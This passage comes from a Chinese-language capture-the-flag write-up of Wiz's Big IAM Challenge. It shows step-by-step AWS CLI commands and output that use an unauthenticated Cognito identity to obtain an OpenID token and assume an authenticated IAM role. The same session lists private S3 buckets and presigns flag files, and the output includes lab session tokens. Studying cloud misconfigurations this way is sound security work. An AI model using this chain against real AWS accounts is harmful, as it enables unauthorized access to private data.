b5CAQVCcS0W4EDh9YxaqTU4XjN+mF5RYofC6ac=", "Expiration": 1709238403.0 } }
拿了凭证我们直接访问存储桶就行了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 > aws configure set aws_access_key_id xxx --profile wiz > aws configure set aws_secret_access_key xxx --profile wiz > aws configure set aws_session_token xxx --profile wiz > aws s3api list-objects --bucket wiz-privatefiles --profile wiz { "Contents": [ { "Key": "cognito1.png", "LastModified": "2023-06-05T19:42:27+00:00", "ETag": "\"539693e3b6f41aa7545e9f8965c3cadd\"", "Size": 4220, "StorageClass": "STANDARD", "Owner": { "DisplayName": "shir+ctf", "ID": "37ec5af87b339325fbafa92e65fbd5f5ab4bcd7e733fa76838720554da48d3f9" } }, { "Key": "flag1.txt", "LastModified": "2023-06-05T13:28:35+00:00", "ETag": "\"20fcd58d8bdd4d81814b501230a94727\"", "Size": 37, "StorageClass": "STANDARD", "Owner": { "DisplayName": "shir+ctf", "ID": "37ec5af87b339325fbafa92e65fbd5f5ab4bcd7e733fa76838720554da48d3f9" } } ], "RequestCharged": null }
再获取一下对象url,这里可以给url签名来获取
1 2 3 > aws s3 presign s3://wiz-privatefiles/flag1.txt --expires-in 3600 --profile wiz https://wiz-privatefiles.s3.amazonaws.com/flag1.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIARK7LBOHXC5OGAMXN%2F20240229%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240229T200016Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjECQaCXVzLWVhc3QtMSJIMEYCIQCreeDqdCLRCcfyVNOq1CvG9MGhYGh2gg0KCYXwqIsmTQIhAOpt8RWhK4cF2qkcddSqTjjoy7xtES2YIqmgtq2xkOcZKsgFCB0QABoMMDkyMjk3ODUxMzc0IgwVRgMrNLSKcA6WlzUqpQXee%2B8shf0SXztS2bMD%2FCt0YUf3WsEHlIcTwANRm%2Fvyjn%2FgdrtI44jm3%2Bwm6wi2%2BOmqucy3kkHAafqx%2Fa314DNSxVlvYJUCPIXnVFddlFXxihuF5uR33dh3SoCHjysIEcvHLrVKz0DODvWb2qOpS7X7qav0%2F5rP6%2BsMIGzOtQzNMpLh4uaJAESVcLRtL0X3lfj11wG95cu7YWuAr6hSA%2FFX8YcKiZM8NRnGihhQ7NA0n7Xt0484fEOWPx6NB7Ud8zBhdOS5bKUO2M5gVvLVVG%2F5ZsZOjYQIUp7I%2FoaTLzoIdcmKIUPHnpnrcqwR3dyI%2FMJOdCqLfHn5sLSGQNV8525B6W4GOGDOwoCSEnqluBcsdYS%2Fy1K%2FoojMAo9MUtyTzvexRvXkwRof5HEPXP75VnmTscZHz6maAKqr8JLYlTMA49nfK6txwjgBS8am3bnUrrmaBTUGZsrMFV6EYhUOjlFvpBkYfeS1aphlE7cL00uJUiCaNpeuodt6nPek%2BzLwDC3d4CpFhdZydUL7HiLUxdc4YjFiIqrv3bVpaG3sLM%2B6B04qw8e5mqOMIkM5G7Ka6IqBjDiSGB8PVj51120PJKFZCKqfBXWaFASV7m90dOUX%2Bx0FkZ5LUq2ASu8PQfREt8rmeqoxQA12yMpwOxoDewVsaiQHEek%2B%2FNeuncoCz0Wkag8PupbmqFHLA4QiLQGErZJIMoB6meNbkHx5Ywclr%2FUInf1nAtgxQ%2BdFf1u2c6j9taDL59Ce39lcRvaMepSaJDJ4r0cp9NLmxm2mszJ0mf2oCdvjjMEiGO49UTziVecXgEZuvc58kQNtGBrccNqKb65PvpIlTX%2BLNFQccC3w3%2F8rtGhvm6FzF1TpIROqycBvomMrRR6SjDXO6KDE6M27iF36yog6DjDsv4OvBjrdAh5UHsBXUld7Q%2F4VNfOQyJEkulNbWx0V9AU4KXBKc6n57ErV55jLKHoj181DdskSag2s2CnZI2D%2BNG9CGxVvQTmII4admiH03N0EA7Vj697HWHnyYLguRWexhL3%2FBWS3rL9DuESZz8%2FEaDnGMK9niThrA7TPCUqszGGLnCRRrzjvbAijW72STHWKMnQuujfyKg70ZPwmm9YhOoHZGv1WcHS9MG7DfhylAKvvwaabk7ND%2BgF6NqDakqzewM8aeWExjX9SZsXe6CvOb%2F0X52XO3k6kUWetqGmvnyn0Fjv1oQ6vLR9q4G7%2F5UbX%2Be1LSs4FzpJt8oFcGsyZrfLPPeKnNotXJMfVfyoRcvU%2BI3RI5dYUSfzdjBE0jptm5o2vzZnw9GIuIlF4%2Bg9ML7KPZ7BMEJ65W8aFksGZybu2Xw5uEDk23VtJgj%2BedyWzzuiKw745pnPekafrH8706xR4r7M%3D&X-Amz-Signature=eebf31960b30ae0b129ecadd1cee1d58d29636e25f236d1d79667270cd94f9b2
One final push
Anonymous access no more. Let’s see what can you do now.
Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role
最后一题,IAM如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Federated": "cognito-identity.amazonaws.com" }, "Action": "sts:AssumeRoleWithWebIdentity", "Condition": { "StringEquals": { "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b" } } } ] }
这个题的Principal中出现了一个Federated,我们来看看文档的解释
Web 身份会话主体 Web 身份会话主体 是使用 AWS STS AssumeRoleWithWebIdentity 操作产生的会话主体。您可以使用外部 Web 身份提供程序 (IdP) 登录,然后使用此操作代入 IAM 角色。这利用了联合身份并发出角色会话。有关哪些主体可以使用此操作代入角色的更多信息,请参阅 比较 AWS STS API 操作 。
当通过 Web 身份提供程序发出角色时,您将获得这种特殊类型的会话主体,其中包括 Web 身份提供程序相关信息。
在策略中使用此主体类型可基于受信任的 Web 身份提供程序来允许或拒绝访问。要指定角色信任策略 Principal 元素中 Web 身份角色会话的 ARN,请采用以下格式:
1 2 3 4 "Principal": { "Federated": "cognito-identity.amazonaws.com" } "Principal": { "Federated": "www.amazon.com" } "Principal": { "Federated": "graph.facebook.com" } "Principal": { "Federated": "accounts.google.com" }
那么此处策略的主题是针对经过cognito-identity认证的Web身份会话主体的,可以进行sts:AssumeRoleWithWebIdentity操作,我们继续去文档看看这个操作。
https://docs.aws.amazon.com/zh_cn/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html
这里是英文,摘要一部分
Returns a set of temporary security credentials for users who have been authenticated in a mobile or web application with a web identity provider. Example providers include the OAuth 2.0 providers Login with Amazon and Facebook, or any OpenID Connect-compatible identity provider such as Google or Amazon Cognito federated identities .
拥有 OpenID Connect 令牌后,您就可以通过 AWS Security Token Service (STS) 中的 AssumeRoleWithWebIdentity API 调用将此令牌换为临时 AWS 凭证。
也就是说只要通过了cognito-identity的认证,就可以执行AssumeRoleWithWebIdentity,用我们的token换一个凭证,这个IAM是用来配置角色信任和权限的,参考文档
https://docs.aws.amazon.com/zh_cn/cognito/latest/developerguide/role-trust-and-permissions.html
https://docs.aws.amazon.com/zh_cn/cognito/latest/developerguide/iam-roles.html
呈现给 AWS STS 的令牌由身份池生成,身份池将用户群体、社交或 OIDC 提供者令牌或 SAML 断言转换为自己的令牌。身份池令牌包含一个 aud 声明,即身份池 ID。
以下示例角色信任策略允许联合身份服务主体 cognito-identity.amazonaws.com 调用 AWS STS API AssumeRoleWithWebIdentity。仅当 API 请求中的身份池令牌具有以下声明时,请求才会成功。
这里还有一个关于cognito-identity.amazonaws.com:aud的限制,在这里也就是限定了连接池的id。
先用get-id来获取一个id
1 2 3 4 5 > aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b { "IdentityId": "us-east-1:157d6171-eea3-c802-0b38-5f5c44f832ac" }
用get-open-id-token可以获取到一个OpenID token,这下有用了
1 2 3 4 5 6 > aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-eea3-c802-0b38-5f5c44f832ac { "IdentityId": "us-east-1:157d6171-eea3-c802-0b38-5f5c44f832ac", "Token": "eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVhMy1jODAyLTBiMzgtNWY1YzQ0ZjgzMmFjIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MDkyMzk0NzEsImlhdCI6MTcwOTIzODg3MX0.UDEyn3rMBFHJUL5tRANeUucbOcWFVdmpqHT7EZDVsGCJ-_lSO9aU2MYEYxdrDFE0sfQY6kEFlXdfYrNKE-dcsU06FVD0nF3A5zebtA78TQh4FvPGNCgDiy3gOCGlHgoQNOoRwIJpLcWPfBKS_fEsC_vh6fDAwBtK1ngsyr4RlwhmA_kQ_ysw-sl1Pg0hzeEWbWWBLPIV7zPcTrcPCdJjBZmmQZdUv2Ft3EzfXFJJtuh7rC9niJdMS6Sg-Lz9hRn_mjWUTLqqLTEmwyELBxc-urUXjfVvcIexCYL_X4kArRvDMd-22oLUGiwiNnkSTomlKzhiht3nx9gd2j6rM5Fp-w" }
拿着这个去调用AssumeRoleWithWebIdentity即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 > aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name A.R. --web-identity-token eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVhMy1jODAyLTBiMzgtNWY1YzQ0ZjgzMmFjIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MDkyMzk0NzEsImlhdCI6MTcwOTIzODg3MX0.UDEyn3rMBFHJUL5tRANeUucbOcWFVdmpqHT7EZDVsGCJ-_lSO9aU2MYEYxdrDFE0sfQY6kEFlXdfYrNKE-dcsU06FVD0nF3A5zebtA78TQh4FvPGNCgDiy3gOCGlHgoQNOoRwIJpLcWPfBKS_fEsC_vh6fDAwBtK1ngsyr4RlwhmA_kQ_ysw-sl1Pg0hzeEWbWWBLPIV7zPcTrcPCdJjBZmmQZdUv2Ft3EzfXFJJtuh7rC9niJdMS6Sg-Lz9hRn_mjWUTLqqLTEmwyELBxc-urUXjfVvcIexCYL_X4kArRvDMd-22oLUGiwiNnkSTomlKzhiht3nx9gd2j6rM5Fp-w { "Credentials": { "AccessKeyId": "ASIARK7LBOHXLXX4MU5G", "SecretAccessKey": "6STeVlIbcNKf+1HXbCXX3XTuLH/nEoh/rBw02qxp", "SessionToken": "IQoJb3JpZ2luX2VjECUaCXVzLWVhc3QtMSJHMEUCIBKY5MN7n5EgZqjOQjee98l6Qnu+QR9AceJZtivuPzZ+AiEAoz92y/gWW3iBKTma3Zi264ZSDW/tKokG28kpav8V77kqhQMIHhAAGgwwOTIyOTc4NTEzNzQiDOL+gEWh/lK1PIjXViriAjDkoYmr6iy0lf9lvXr07llzPt0dSlkc9MpBxeRqhEwapZjUpSC+HVPncYxC90OTdLUPDLod82wfwmPlG7fCrjaN8nitC+fX9tF7SvR6O6FgfU6ZDuS7Uf2sIkhm+Yxir6qCPxF/M1VAQPoGJJO0uwS2iV28wG/B2Mhol0t0q8uQQUNccs+jHFB/6KY9MqAZQ9veMSCQRZ4tPJmLDd2NxyEO3kpOx2QG00fWEjVqjN55ti13YEio+YwQCCSvX6+oC4rEuxL1T/1E5MK3YzYQRavTfb4T9P5fwxDqYpzMgOYYrAFYbNwaUGmuJuN/K33wxc0kWncm6qOOOCs2h/koi/dPfw25Ap0G07t6gAnqdtQFDOPLnmh5pwbUW/TFZ/RGLyWp8aMczQAl6fI0bjL789jVaWxdRrcCNuNkqQukCuX6Zqb1RGUw76ctMthzYUywGmbFVmS+uZUQ916K6GEIHRDa/jDU1oOvBjqHAjJQDQ7tGIInLh30Z+1TXHK0Dj/PPYJOT2fqUjz6rpiykoLaPshH7O9us01E33fj8bxgtBtNEahBHUb9RznKmdzU3v/6QvvnWMwinBtnHubl0Nu9JdU2lUMzt+BeN0Db1P1bzGxmEXfUvmyZZZG00DaGFuEi5Z9bYGBSJZgErVGx4xCgItKOjJCHlF3dTrFOaTjnUxNlbEljMcqif99u0l0kPIMHBWVvdgRFh3OXjrCG4ta5EjMv3pyqizmmtItCPeojMsOf5vr2jxpIivCHlJJVwsgPwMkWWW4wAQ+4d4VzDrPsbmSYUleoXbtcxoBnmW2LNjqf5N7owAPRbLV0BgMen/VJQU3T", "Expiration": "2024-02-29T21:38:44+00:00" }, "SubjectFromWebIdentityToken": "us-east-1:157d6171-eea3-c802-0b38-5f5c44f832ac", "AssumedRoleUser": { "AssumedRoleId": "AROARK7LBOHXASFTNOIZG:A.R.", "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/A.R." }, "Provider": "cognito-identity.amazonaws.com", "Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b" }
导入即可
1 2 3 4 5 6 7 > aws sts get-caller-identity { "UserId": "AROARK7LBOHXASFTNOIZG:A.R.", "Account": "092297851374", "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/A.R." }
查看一下存储桶
1 2 3 4 5 6 7 > aws s3 ls 2023-06-05 01:07:29 tbic-wiz-analytics-bucket-b44867f 2023-06-05 21:07:44 thebigiamchallenge-admin-storage-abf1321 2023-06-05 00:31:02 thebigiamchallenge-storage-9979f4b 2023-06-05 21:28:31 wiz-privatefiles 2023-06-05 21:28:31 wiz-privatefiles-x1000
列存储桶
1 2 3 > aws s3 ls wiz-privatefiles-x1000 2023-06-06 03:42:27 4220 cognito2.png 2023-06-05 21:28:35 40 flag2.txt
获取url
1 2 > aws s3 presign wiz-privatefiles-x1000/flag2.txt https://wiz-privatefiles-x1000.s3.us-east-1.amazonaws.com/flag2.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIARK7LBOHXLXX4MU5G%2F20240229%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240229T204708Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjECUaCXVzLWVhc3QtMSJHMEUCIBKY5MN7n5EgZqjOQjee98l6Qnu%2BQR9AceJZtivuPzZ%2BAiEAoz92y%2FgWW3iBKTma3Zi264ZSDW%2FtKokG28kpav8V77kqhQMIHhAAGgwwOTIyOTc4NTEzNzQiDOL%2BgEWh%2FlK1PIjXViriAjDkoYmr6iy0lf9lvXr07llzPt0dSlkc9MpBxeRqhEwapZjUpSC%2BHVPncYxC90OTdLUPDLod82wfwmPlG7fCrjaN8nitC%2BfX9tF7SvR6O6FgfU6ZDuS7Uf2sIkhm%2BYxir6qCPxF%2FM1VAQPoGJJO0uwS2iV28wG%2FB2Mhol0t0q8uQQUNccs%2BjHFB%2F6KY9MqAZQ9veMSCQRZ4tPJmLDd2NxyEO3kpOx2QG00fWEjVqjN55ti13YEio%2BYwQCCSvX6%2BoC4rEuxL1T%2F1E5MK3YzYQRavTfb4T9P5fwxDqYpzMgOYYrAFYbNwaUGmuJuN%2FK33wxc0kWncm6qOOOCs2h%2Fkoi%2FdPfw25Ap0G07t6gAnqdtQFDOPLnmh5pwbUW%2FTFZ%2FRGLyWp8aMczQAl6fI0bjL789jVaWxdRrcCNuNkqQukCuX6Zqb1RGUw76ctMthzYUywGmbFVmS%2BuZUQ916K6GEIHRDa%2FjDU1oOvBjqHAjJQDQ7tGIInLh30Z%2B1TXHK0Dj%2FPPYJOT2fqUjz6rpiykoLaPshH7O9us01E33fj8bxgtBtNEahBHUb9RznKmdzU3v%2F6QvvnWMwinBtnHubl0Nu9JdU2lUMzt%2BBeN0Db1P1bzGxmEXfUvmyZZZG00DaGFuEi5Z9bYGBSJZgErVGx4xCgItKOjJCHlF3dTrFOaTjnUxNlbEljMcqif99u0l0kPIMHBWVvdgRFh3OXjrCG4ta5EjMv3pyqizmmtItCPeojMsOf5vr2jxpIivCHlJJVwsgPwMkWWW4wAQ%2B4d4VzDrPsbmSYUleoXbtcxoBnmW2LNjqf5N7owAPRbLV0BgMen%2FVJQU3T&X-Amz-Signature=23eca23e936936807ae7ae2774abcb0a5670a5a2c8fe58005a1477a0db9a8878
Reference https://teamssix.com/230709-131807
https://zhuanlan.zhihu.com/p/659223965
https://blog.51cto.com/u_16179749/8904445
https://baijiahao.baidu.com/s?id=1785861551991145804&wfr=spider&for=pc
https://zhuanlan.zhihu.com/p/640548397
https://wiki.teamssix.com/CloudService/S3/bucket-acl-able-to-write.html
